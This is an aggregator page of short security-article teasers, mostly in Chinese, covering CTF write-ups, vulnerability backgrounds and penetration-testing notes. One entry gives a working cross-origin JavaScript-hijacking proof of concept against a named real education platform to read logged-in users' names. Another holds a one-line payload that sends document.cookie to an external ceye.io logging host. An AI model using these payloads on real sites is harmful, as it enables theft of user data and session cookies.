Aggregator

0x01 存在即合理http是非常常见的应用层协议，是超文本传输协议的简称，其传输的内容都是明文的。在这个混乱的世界，明文传输信息想想就可怕，网络“小混混”的手段远比我们这些凡人高明得多，他们有...

BroadcastTest 背景 逆向APK可知程序中仅有MainActivity$Message和三个Receiver类。 前者实现了一个Parcelable类，后三个则是广播。 其中Receiver1是export的，接收并向Receiver2发送广播，Receiver2和3则非export，只能接收内部发送的广播。 功能为Receiver1接收base64传入的data，然后将其反序列化得到...

Learn about authentication, authorization, and security misconfiguration in API compromises by exploring this capture-the-flag game.

SaltStack漏洞背景国外安全团队(F-Secure) 发现多了SaltStack漏洞，其中最严重的两个

0x00 Disclaimer          由于coronavirus的影响，学校安排我们上网课，可能是由于学习太累，做梦都梦到了上网课了，而且还梦到了一个漏洞百出的网课平台。最近我梦到发现了一个非常有趣的漏洞,在我在梦中发现的这个平台的大大小小的漏洞中，这个虽然不是最严重的，但是是最有趣的。
         幸好在做梦的时候还顺手截了图，这才能够跟大家分享。本文所述内容纯属意淫，如果您在现实生活中碰到了长得相似的系统那完全是巧合，和本人一丢丢关系都没有

0x01 漏洞发现          在睡梦中闲来无事抓个包，发现包里面居然有很好玩的内容
什么，一个疑似JS的文件里面包含了我的名字？
赶快翻上去header，发现了这个
这说明了什么？这个头指示浏览器把这个请求回来的东西当作JS代码，由于JS可以允许跨域，攻击者可以在html中精心构造JS来访问这些信息 0x02 漏洞原理成因背景 笔者很懒惰，发现先知社区讲的更好，就直接贴上链接了：https://xz.aliyun.com/t/7204
0x03 漏洞POC编写 这里面所有的信息都是被document.writeln包裹起来了，但是我们可以通过覆盖这个函数实现获取信息而不是傻乎乎地把信息写在页面上。基于这一点，我们可以很容易地写出POC代码 <!DOCTYPE html> <head>     <meta charset="UTF-8">     <title>！！！</title> </head> <body>     <h1 id="msg" style="color:red"></h1>     <script>     name=''     islogin=1;     document.writeln=function(text)     {         match=text.match(/zt_u_name">(.*?)</)         if(match !==null)         {             name=match[1];         }         if(text.search("http://passport2.chaoxing.com/wlogin")!==-1)             islogin=0;     }     </script>     <script src="https://3wfy-ans.chaoxing.com/passport/allHead.shtml"> </script>     <script>         if(islogin)             msg="X星XX通并不存在什么信息泄露漏洞。是吧,"+name+"同学?";         else             msg="你还没有登陆X星XX通，这我还怎么装逼啊？"         document.getElementById('msg').innerText=msg     </script> </body> </html> POC实测效果：
源码懒得放在github了，想要的自己复制自己玩
0x04 对漏洞的一些思考 或许可以整个扫描器，搞多个不同的用户，爬取后对比JS区别，自动化发掘这种洞？ 又或者像个办法来自动搜集JS里面的敏感信息？

NCSC technical paper about the privacy and security design of the NHS contact tracing app developed to help slow the spread of coronavirus.

HTTP cache cross site leaks in XSLeaks

密码和口令是通往权限和控制效果的重要途径，通过获取目标的重要系统口令或口令设置规律，能够有效的实现横向移动和重要的权限提升，因此密码/口令在渗透测试过程中被作为重点关注对象，比如在我们获取某目标系统的Webshell时，往往会第一时间查看数据库配置文件获取数据库账号密码，进而可以有效的访问系统数据。那么除了通过配置文件的方式获取密码外，在渗透测试的过程中还有哪些途径可以获取此类密码呢

看csp规则，默认是在当前域内，允许执行内联js。如果这是一道ctf的话，就很简单了， window.location.href='http://aa.xxxx.ceye.io?'+document.cookie;能把cookie传出来。 但是要是远程加载js文件是不满足csp规则的。 iframe

案例是在最近项目中遇到的俩个站，挺有意思的，所以分享出来。第一个站getshell后，内网简单的看了下，发现不是目标就没深入。 第一个站 1、弱口令 弱口令：admin admin进入网站后台 2、任意文件下载 在系统配置备份模块发现http://xxx.xxx.xxx.xxx/DownloadSe

我们提“以攻促防”想表达的点也很简单：做安全的，需要懂得攻击，发现问题，还需要懂得防御，解决问题。概念就是这么简单。剩下的呢？实战出真知。

Revisiting Cookie Crimes In 2018 @mangopdf described “Cookie Crimes”, which is great research around Chrome’s remote debugging feature that allows adversaries and malware to gain access to cookies quite convienently during post-exploitation. The original research is published here, and it still works today. The new Microsoft Edge browser and Chromium Microsoft’s latest Edge browser is based on the same code, Chromium. I guess, you already know where this is going now…

低功耗蓝牙小工具

繁星之下，大多数人的生活都是朴实无华的，但总会有些点滴让人觉得世界是如此的美好。

COVID-19 has turned the tech world upside down. Read what a future IT director thought we did right&mdash;and what went terribly wrong.

Guidance for members of the public, website administrators and JavaScript developers in relation to the recently publicised cryptocurrency mining compromises of several websites

MethodVisitor ClassVisitor的visitMethod能够访问到类中某个方法的一些入口信息，那么针对具体方法中字节码的访问是由MethodVisitor来进行的 访问顺序如下，其中visitCode和visitMaxs仅调用一次，标志方法字节码访问的开始和结束 MethodVi

一些内心独白

笔者近期阅读了十几个知名公司和机构的年度报告，将一些要点总结分享给大家。

这里分享我们实践的一个新思路，能有效达到IAST/RASP快速部署的目的。